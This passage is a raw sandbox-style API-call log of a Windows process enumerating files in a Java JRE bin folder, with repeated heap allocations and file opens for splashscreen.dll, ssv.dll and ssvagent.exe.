0x351f0 [0093.984] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0093.985] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0093.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0093.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0093.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0093.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a9b0 [0093.985] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0093.985] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0093.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0093.985] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0093.985] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.985] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.985] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.985] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.985] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0093.985] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0093.985] AreFileApisANSI () returned 1 [0093.985] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\splashscreen.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\splashscreen.dll", lpUsedDefaultChar=0x0) returned 56 [0093.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0093.985] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.985] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0093.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0093.985] AreFileApisANSI () returned 1 [0093.985] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0093.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0093.985] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x75cd8, cchWideChar=56 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\splashscreen.dll") returned 56 [0093.985] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\splashscreen.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\splashscreen.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.986] GetFileType (hFile=0x360) returned 0x1 [0093.986] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0093.986] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0093.986] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0093.986] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0093.986] CloseHandle (hObject=0x360) returned 1 [0093.986] AreFileApisANSI () returned 1 [0093.986] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0093.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0093.987] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x75e40, cchWideChar=56 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\splashscreen.dll") returned 56 [0093.987] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\splashscreen.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\splashscreen.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.987] GetFileType (hFile=0x360) returned 0x1 [0093.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0093.987] CloseHandle (hObject=0x360) returned 1 [0093.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0093.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0093.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0093.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0093.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0093.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0093.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0093.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0093.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0093.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0093.988] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0093.988] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0093.988] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0093.988] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0093.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0093.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0093.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0093.988] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0093.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0093.988] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0093.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0093.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0093.988] AreFileApisANSI () returned 1 [0093.988] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0093.988] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0093.988] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x76110, cchWideChar=56 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\splashscreen.dll") returned 56 [0093.988] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\splashscreen.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\splashscreen.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x32040)) returned 1 [0093.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0093.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0093.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0093.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0093.988] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.988] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.988] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x8ba40, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ssv.dll", cAlternateFileName="")) returned 1 [0093.988] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0093.988] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0093.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0093.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0093.988] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0093.988] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0093.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0093.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0093.989] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0093.989] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a630 [0093.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0093.989] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0093.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a630 | out: hHeap=0x20000) returned 1 [0093.989] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.989] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.989] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.989] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0093.989] AreFileApisANSI () returned 1 [0093.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssv.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssv.dll", lpUsedDefaultChar=0x0) returned 47 [0093.989] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0093.989] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.989] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.989] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0093.989] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0093.989] AreFileApisANSI () returned 1 [0093.989] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0093.989] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x719c8 [0093.989] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x719c8, cchWideChar=47 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssv.dll") returned 47 [0093.989] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssv.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\ssv.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.990] GetFileType (hFile=0x360) returned 0x1 [0093.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0093.990] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0093.990] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0093.990] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0093.990] CloseHandle (hObject=0x360) returned 1 [0093.990] AreFileApisANSI () returned 1 [0093.990] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0093.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71a98 [0093.990] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x71a98, cchWideChar=47 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssv.dll") returned 47 [0093.990] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssv.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\ssv.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.991] GetFileType (hFile=0x360) returned 0x1 [0093.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0093.991] CloseHandle (hObject=0x360) returned 1 [0093.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.991] AreFileApisANSI () returned 1 [0093.991] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0093.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71550 [0093.991] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x71550, cchWideChar=47 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssv.dll") returned 47 [0093.991] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssv.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\ssv.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x8ba40)) returned 1 [0093.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0093.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0093.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0093.992] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0093.992] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.992] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.992] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ssvagent.exe", cAlternateFileName="")) returned 1 [0093.992] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.992] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.992] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.992] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.992] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.992] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.992] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.992] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.992] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0093.992] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0093.992] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0093.992] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0093.992] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0093.992] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0093.992] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0093.992] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0093.992] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.992] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0093.992] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.992] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a3b0 [0093.992] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0093.992] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.992] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0093.992] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0093.992] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.992] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.992] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.992] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.992] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0093.992] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.992] AreFileApisANSI () returned 1 [0093.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssvagent.exe", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssvagent.exe", lpUsedDefaultChar=0x0) returned 52 [0093.992] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0093.993] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 